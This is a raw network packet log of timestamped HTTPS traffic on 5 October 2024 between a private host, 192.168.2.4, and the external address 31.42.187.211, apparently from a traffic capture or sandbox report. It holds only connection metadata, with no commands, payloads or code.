Oct 5, 2024 01:03:08.849627018 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.545582056 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.560738087 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:09.560779095 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.973795891 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.973828077 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.973849058 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.973911047 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:09.973958015 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:09.973994017 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:09.974023104 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.004237890 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.004282951 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.004336119 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.004353046 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.004394054 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.056276083 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.122736931 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.122757912 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.122875929 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.122896910 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.124675989 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.125277996 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.125298977 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.125375986 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.125390053 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.126928091 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.128655910 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.128674984 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.128762007 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.128774881 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.128843069 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.131007910 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.131083965 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.131114960 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.131128073 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.131156921 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.131170988 CEST	443	49742	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.131181955 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.131232977 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.131635904 CEST	49742	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.143325090 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.143435955 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.143543005 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.143708944 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.143748999 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.869498968 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:10.915759087 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.991638899 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:10.991678953 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220555067 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220586061 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220596075 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220617056 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220678091 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.220679045 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220741034 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.220776081 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.220776081 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.220803022 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.360461950 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.360490084 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.360599995 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.360631943 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.360699892 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.475176096 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.475205898 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.475297928 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.475372076 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.475439072 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.475439072 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.477036953 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.477118015 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.477143049 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.477165937 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.477199078 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.477250099 CEST	443	49744	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.477312088 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.477596045 CEST	49744	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.489202976 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.489275932 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:11.489382029 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.489628077 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:11.489658117 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.208806038 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.217775106 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.217830896 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.548618078 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.549036026 CEST	443	49746	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.549146891 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.550611019 CEST	49746	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.556291103 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.556390047 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:12.556499004 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.556808949 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:12.556843996 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.303265095 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.305468082 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.305494070 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.631237030 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.632030010 CEST	443	49747	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.632206917 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.634063005 CEST	49747	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.639486074 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.639524937 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:13.639595032 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.639847994 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:13.639863968 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.333874941 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.335004091 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.335020065 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.659769058 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.660345078 CEST	443	49748	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.660460949 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.661385059 CEST	49748	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.665079117 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.665168047 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:14.665256023 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.665456057 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:14.665489912 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.439434052 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.440964937 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.441023111 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.785130978 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.785190105 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.785234928 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.785295010 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.785361052 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.785410881 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.785502911 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.899261951 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.899334908 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.899437904 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.899456024 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:15.899501085 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:15.899555922 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.018274069 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.018335104 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.018552065 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.018552065 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.018615007 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.019068956 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.020406008 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.020452023 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.020508051 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.020520926 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.020562887 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.022777081 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.022923946 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.022973061 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.023027897 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.023039103 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.023082018 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.023142099 CEST	443	49750	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.023180008 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.030778885 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.035042048 CEST	49750	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.154567003 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.154599905 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.154687881 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.156483889 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.156497955 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.874175072 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:16.875880957 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:16.875900030 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.223666906 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.223728895 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.223772049 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.223961115 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.223989964 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.224054098 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.367182016 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.367242098 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.367443085 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.367443085 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.367476940 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.367527962 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.481738091 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.481760025 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.481828928 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.481846094 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.481975079 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.484026909 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.484051943 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.484114885 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.484122038 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.484255075 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.486695051 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.486716032 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.486756086 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.486762047 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.486789942 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.486799955 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.598560095 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.598592043 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.598654032 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.598669052 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.598684072 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.598848104 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.600764036 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.600786924 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.600857019 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.600863934 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.600908995 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.603373051 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.603409052 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.603454113 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.603461027 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.603488922 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.603502989 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.605828047 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.605855942 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.605916023 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.605923891 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.605951071 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.605979919 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.608338118 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.608374119 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.608417988 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.608426094 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.608447075 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.608465910 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.610161066 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.610182047 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.610222101 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.610228062 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.610256910 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.610272884 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.717195034 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.717257023 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.717298031 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.717318058 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.717354059 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.717374086 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.717412949 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.717595100 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.718117952 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.718128920 CEST	443	49751	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.718151093 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.718180895 CEST	49751	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.781132936 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.781219006 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:17.781344891 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.781708956 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:17.781744003 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.493640900 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.514058113 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.514117002 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.831589937 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.831621885 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.831643105 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.831726074 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.831788063 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.831855059 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.952435017 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.952456951 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.952521086 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.952542067 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.952594995 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.952595949 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.954097986 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.954121113 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.954161882 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.954174995 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:18.954201937 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:18.954221964 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.073817968 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.073834896 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.073879004 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.073924065 CEST	443	49752	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.073923111 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.073956013 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.073993921 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.074553967 CEST	49752	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.086635113 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.086734056 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.086822987 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.087070942 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.087110043 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.776746988 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:19.778557062 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:19.778609991 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.115298033 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.115355015 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.115454912 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.115529060 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.115575075 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.115645885 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.115689039 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.223097086 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.223165989 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.223222971 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.223263979 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.223294020 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.223315954 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.337627888 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.337688923 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.337832928 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.337853909 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.337960005 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.339617968 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.339662075 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.339708090 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.339721918 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.339752913 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.339773893 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.341741085 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.341785908 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.341830969 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.341841936 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.341866970 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.341900110 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.453602076 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.453648090 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.455357075 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.457667112 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.459362030 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.459408998 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.459467888 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.459503889 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.459534883 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.459563017 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.459582090 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.459621906 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.459635019 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.461987019 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.462007999 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.462081909 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.462099075 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.462991953 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.463018894 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.463052988 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.463061094 CEST	443	49753	31.42.187.211	192.168.2.4
